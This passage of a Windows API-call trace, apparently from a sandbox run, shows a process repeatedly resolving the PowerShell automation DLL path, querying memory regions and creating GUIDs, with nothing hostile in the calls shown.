	[0383.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.494] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.494] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.494] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.494] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.494] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.494] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.494] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.494] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x9a5b5ddf, Data2=0xbc2a, Data3=0x4ca8, Data4=([0]=0xba, [1]=0xaf, [2]=0xcd, [3]=0x7, [4]=0xbb, [5]=0xd5, [6]=0xa1, [7]=0x59))) returned 0x0
	[0383.495] VirtualQuery (in: lpAddress=0x24b860, lpBuffer=0x24c720, dwLength=0x30 | out: lpBuffer=0x24c720*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.495] VirtualQuery (in: lpAddress=0x24b860, lpBuffer=0x24c720, dwLength=0x30 | out: lpBuffer=0x24c720*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.495] VirtualQuery (in: lpAddress=0x24b8f0, lpBuffer=0x24c7b0, dwLength=0x30 | out: lpBuffer=0x24c7b0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.496] VirtualQuery (in: lpAddress=0x24b860, lpBuffer=0x24c720, dwLength=0x30 | out: lpBuffer=0x24c720*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.496] VirtualQuery (in: lpAddress=0x24b8f0, lpBuffer=0x24c7b0, dwLength=0x30 | out: lpBuffer=0x24c7b0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.497] VirtualQuery (in: lpAddress=0x24b860, lpBuffer=0x24c720, dwLength=0x30 | out: lpBuffer=0x24c720*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.497] VirtualQuery (in: lpAddress=0x24b8f0, lpBuffer=0x24c7b0, dwLength=0x30 | out: lpBuffer=0x24c7b0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.497] VirtualQuery (in: lpAddress=0x24b860, lpBuffer=0x24c720, dwLength=0x30 | out: lpBuffer=0x24c720*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.497] VirtualQuery (in: lpAddress=0x24b8f0, lpBuffer=0x24c7b0, dwLength=0x30 | out: lpBuffer=0x24c7b0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.498] VirtualQuery (in: lpAddress=0x24b860, lpBuffer=0x24c720, dwLength=0x30 | out: lpBuffer=0x24c720*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.498] VirtualQuery (in: lpAddress=0x24b8f0, lpBuffer=0x24c7b0, dwLength=0x30 | out: lpBuffer=0x24c7b0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.499] VirtualQuery (in: lpAddress=0x24b860, lpBuffer=0x24c720, dwLength=0x30 | out: lpBuffer=0x24c720*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.499] VirtualQuery (in: lpAddress=0x24b8f0, lpBuffer=0x24c7b0, dwLength=0x30 | out: lpBuffer=0x24c7b0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.499] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.499] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.500] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.500] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.500] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.500] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.500] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.500] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x53d6cad7, Data2=0xa722, Data3=0x4b14, Data4=([0]=0x9c, [1]=0x43, [2]=0x90, [3]=0x79, [4]=0x9, [5]=0xe3, [6]=0xcf, [7]=0x83))) returned 0x0
	[0383.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.501] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.501] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.501] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.501] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.501] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.501] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
